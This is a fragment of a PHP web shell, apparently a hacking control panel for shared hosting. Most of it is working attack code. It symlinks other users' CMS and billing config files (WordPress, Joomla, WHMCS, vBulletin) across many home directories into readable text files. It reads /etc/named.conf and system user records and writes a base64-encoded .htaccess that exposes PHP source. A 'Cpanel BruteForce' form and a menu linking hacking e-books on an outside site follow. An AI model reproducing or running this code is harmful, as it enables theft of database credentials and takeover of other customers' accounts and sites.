symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
|
||
|
symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
|
||
|
symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
|
||
|
symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
|
||
|
symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
|
||
|
symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
|
||
|
symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
|
||
|
}
|
||
|
|
||
|
$d0mains = @file("/etc/named.conf");
|
||
|
|
||
|
if($d0mains)
|
||
|
{
|
||
|
mkdir($fn);
|
||
|
chdir($fn);
|
||
|
|
||
|
foreach($d0mains as $d0main)
|
||
|
{
|
||
|
if(eregi("zone",$d0main))
|
||
|
{
|
||
|
preg_match_all('#zone "(.*)"#', $d0main, $domains);
|
||
|
flush();
|
||
|
|
||
|
if(strlen(trim($domains[1][0])) > 2)
|
||
|
{
|
||
|
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
|
||
|
|
||
|
syml($user['name'],$domains[1][0]);
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
echo "<center><font color=lime size=3>[ Done ]</font></center>";
|
||
|
echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
mkdir($fn);
|
||
|
chdir($fn);
|
||
|
$temp = "";
|
||
|
$val1 = 0;
|
||
|
$val2 = 1000;
|
||
|
for(;$val1 <= $val2;$val1++)
|
||
|
{
|
||
|
$uid = @posix_getpwuid($val1);
|
||
|
if ($uid)
|
||
|
$temp .= join(':',$uid)."\n";
|
||
|
}
|
||
|
echo '<br/>';
|
||
|
$temp = trim($temp);
|
||
|
|
||
|
$file5 = fopen("test.txt","w");
|
||
|
fputs($file5,$temp);
|
||
|
fclose($file5);
|
||
|
|
||
|
$htaccess =
|
||
|
'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
|
||
|
aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
|
||
|
biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
|
||
|
';
|
||
|
$file = fopen(".htaccess","w+");
|
||
|
$write = fwrite ($file ,base64_decode($htaccess));
|
||
|
|
||
|
$file = fopen("test.txt", "r") or exit("Unable to open file!");
|
||
|
while(!feof($file))
|
||
|
{
|
||
|
$s = fgets($file);
|
||
|
$matches = array();
|
||
|
$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
|
||
|
$matches = str_replace("home/","",$matches[1]);
|
||
|
if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
|
||
|
continue;
|
||
|
syml($matches,$matches);
|
||
|
}
|
||
|
fclose($file);
|
||
|
echo "</table>";
|
||
|
unlink("test.txt");
|
||
|
echo "<center><font color=lime size=3>[ Done ]</font></center>";
|
||
|
echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
|
||
|
}
|
||
|
echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
|
||
|
exit;
|
||
|
}
|
||
|
?>
|
||
|
<form method="POST" target="_blank">
|
||
|
<strong>
|
||
|
<input name="page" type="hidden" value="find"><table>
|
||
|
</strong><br><br><center><font size="5" style="italic" color="#00ff00">=[ Cpanel BruteForce ]=</font></center><br><br>
|
||
|
<table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
|
||
|
<center><b><font size="5" style="italic" color="#00ff00">Cpanel BruteForce</font></b></center></td></tr>
|
||
|
<tr>
|
||
|
<td>
|
||
|
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
|
||
|
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
|
||
|
<strong>User :</strong></td>
|
||
|
<td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
|
||
|
<strong>Pass :</strong></td>
|
||
|
<td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
|
||
|
<strong>Type :</strong></td>
|
||
|
<td valign="top" bgcolor="#151515" colspan="5">
|
||
|
<span class="style2"><strong>Simple : </strong> </span>
|
||
|
<strong>
|
||
|
<input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
|
||
|
<font class="style2"><strong>/etc/passwd : </strong> </font>
|
||
|
<strong>
|
||
|
<input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
|
||
|
</strong>
|
||
|
</span>
|
||
|
</td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" style="width: 139px"></td>
|
||
|
<td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="start">
|
||
|
</strong>
|
||
|
</td>
|
||
|
<tr>
|
||
|
</form>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>
|
||
|
</tr>
|
||
|
<form method="POST" target="_blank">
|
||
|
<strong>
|
||
|
<input name="mendapatkan" type="hidden" value="passwd">
|
||
|
</strong>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
|
||
|
<td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="foldername" type="text"></strong></td>
|
||
|
</strong>
|
||
|
</td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" style="width: 139px"></td>
|
||
|
<td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
|
||
|
</strong>
|
||
|
</td>
|
||
|
<tr>
|
||
|
</form>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>
|
||
|
</tr>
|
||
|
<form method="POST" target="_blank">
|
||
|
<strong>
|
||
|
<input name="pass" type="hidden" value="password">
|
||
|
</strong>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
|
||
|
<td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="url" type="text"></strong></td>
|
||
|
</strong>
|
||
|
</td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" style="width: 139px"></td>
|
||
|
<td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
|
||
|
</strong>
|
||
|
</td>
|
||
|
<tr>
|
||
|
</form>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
|
||
|
Security</strong></td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
|
||
|
<td valign="top" bgcolor="#151515" colspan="5">
|
||
|
<strong>
|
||
|
<?php
|
||
|
$safe_mode = ini_get('safe_mode');
|
||
|
if($safe_mode=='1')
|
||
|
{
|
||
|
echo 'ON';
|
||
|
}else{
|
||
|
echo 'OFF';
|
||
|
}
|
||
|
|
||
|
?>
|
||
|
</strong>
|
||
|
</td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
|
||
|
<td valign="top" bgcolor="#151515" colspan="5">
|
||
|
<strong>
|
||
|
<form method="POST" target="_blank">
|
||
|
<strong>
|
||
|
<input name="matikan" type="hidden" value="sekatan">
|
||
|
</strong>
|
||
|
|
||
|
<?php
|
||
|
if(''==($func=@ini_get('disable_functions')))
|
||
|
{
|
||
|
echo "<font color=#00ff00>No Security for Function</font></b>";
|
||
|
}else{
|
||
|
echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
|
||
|
echo "<font color=red>$func</font></b>";
|
||
|
echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>';
|
||
|
echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
|
||
|
</strong>
|
||
|
</td></tr>';
|
||
|
}
|
||
|
?></strong></td></tr></table></table></table>
|
||
|
<?
|
||
|
}
|
||
|
///////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'tutor'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=tutor" method="post">
|
||
|
<center><br><br><b>+--=[ Tutorial & Ebook hacking ]=--+</b><br>
|
||
|
<form method="post" action="">
|
||
|
<table class="tabnet" border="1" >
|
||
|
<tr>
|
||
|
<td align="center">English</td><td align="center">Indonesian</td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td><form method="post" action="">
|
||
|
E-book Hacking :
|
||
|
<select class="inputzbut" name="pilih" id="pilih">
|
||
|
<option value=""selected>-----------------[ Select ]-----------------</option>
|
||
|
<option value="tutorial24" > Hacking Exposed-5 </option>
|
||
|
<option value="tutorial25"> Internet Denial Of Service </option>
|
||
|
<option value="tutorial26">Computer Viruses For Dummies</option>
|
||
|
<option value="tutorial27">Hack Attacks Testing</option>
|
||
|
<option value="tutorial28">Secrets Of A Super Hacker</option>
|
||
|
<option value="tutorial29">Stealing The Network</option>
|
||
|
<option value="tutorial30">Hacker's HandBook</option>
|
||
|
</select>
|
||
|
<input type="submit" name="submit" class="inputzbut" value="Download">
|
||
|
</td></form>
|
||
|
<td><form method="post" action="">
|
||
|
Tutorial by X'1N73CT :
|
||
|
<select class="inputzbut" name="pilih" id="pilih">
|
||
|
<option value=""selected>-----------------[ Select ]-----------------</option>
|
||
|
<option value="tutorial2">Search Engine Hacking</option>
|
||
|
<option value="tutorial3">SQL Injection dengan hackbar</option>
|
||
|
<option value="tutorial1" >Bypass Union</option>
|
||
|
</select>
|
||
|
<input type="submit" name="submit" class="inputzbut" value="Download">
|
||
|
</form></td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td>
|
||
|
<form method="post" action="">
|
||
|
E-Book from Syn|gress :
|
||
|
<select class="inputzbut" name="pilih" id="pilih">
|
||
|
<option value=""selected>-----------------[ Select ]-----------------</option>
|
||
|
<option value="cryptography_for_defeloper">Cryptography for Developer</option>
|
||
|
<option value="tutorial31">Mobile Malware Attack and Defense</option>
|
||
|
<option value="forensic">CD and DVD Forensic</option>
|
||
|
<option value="ddd">Open Sourch Security Tools</option>
|
||
|
<option value="metasploit">Metaslpoit Toolkit</option>
|
||
|
<option value="stealing_network">Stealing the Network</option>
|
||
|
<option value="security_polices">Creating Security Polices</option>
|
||
|
</select>
|
||
|
<input type="submit" name="submit" class="inputzbut" value="Download">
|
||
|
</form></td>
|
||
|
<td>
|
||
|
<form method="post" action="">
|
||
|
X-CODE MAGAZINE :
|
||
|
<select class="inputzbut" name="pilih" id="pilih">
|
||
|
<option value=""selected>-----------------[ Select ]-----------------</option>
|
||
|
<option value="tutorial4">X-CODE MAGAZINE 1</option>
|
||
|
<option value="tutorial5">X-CODE MAGAZINE 2</option>
|
||
|
<option value="tutorial6">X-CODE MAGAZINE 3</option>
|
||
|
<option value="tutorial7">X-CODE MAGAZINE 4</option>
|
||
|
<option value="tutorial8">X-CODE MAGAZINE 5</option>
|
||
|
<option value="tutorial9">X-CODE MAGAZINE 6</option>
|
||
|
<option value="tutorial10">X-CODE MAGAZINE 7</option>
|
||
|
<option value="tutorial11">X-CODE MAGAZINE 8</option>
|
||
|
<option value="tutorial12">X-CODE MAGAZINE 9</option>
|
||
|
<option value="tutorial13">X-CODE MAGAZINE 10</option>
|
||
|
<option value="tutorial14">X-CODE MAGAZINE 11</option>
|
||
|
<option value="tutorial15">X-CODE MAGAZINE 12</option>
|
||
|
<option value="tutorial16">X-CODE MAGAZINE 13</option>
|
||
|
<option value="tutorial17">X-CODE MAGAZINE 14</option>
|
||
|
<option value="tutorial18">X-CODE MAGAZINE 15</option>
|
||
|
<option value="tutorial19">X-CODE MAGAZINE 16</option>
|
||
|
<option value="tutorial20">X-CODE MAGAZINE 17</option>
|
||
|
<option value="tutorial21">X-CODE MAGAZINE 18</option>
|
||
|
<option value="tutorial22">X-CODE MAGAZINE 19</option>
|
||
|
<option value="tutorial23">X-CODE MAGAZINE 20</option>
|
||
|
<option value="tutorial024">X-CODE MAGAZINE 21</option>
|
||
|
</select>
|
||
|
<input type="submit" name="submit" class="inputzbut" value="Download" ></a>
|
||
|
</form></td></tr></table><br><br>
|
||
|
<?php
|
||
|
$submit = $_POST ['submit'];
|
||
|
if(isset($submit)) {
|
||
|
$pilih = $_POST['pilih'];
|
||
|
if ( $pilih == 'tutorial1') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://www.pharmconseil-elearning.com/main/upload/by_passing_illegal_mix_of_collations_for_operation__union__by_x_1n73ct.pdf';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial2') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://www.pharmconseil-elearning.com/main/upload/Search_engine_hacking_by_x_1n73ct.pdf';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial3') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://www.pharmconseil-elearning.com/main/upload/Sql_injection_dengan_hackbar.pdf';
|
||
|
</script>
|
||
|
<?php
|
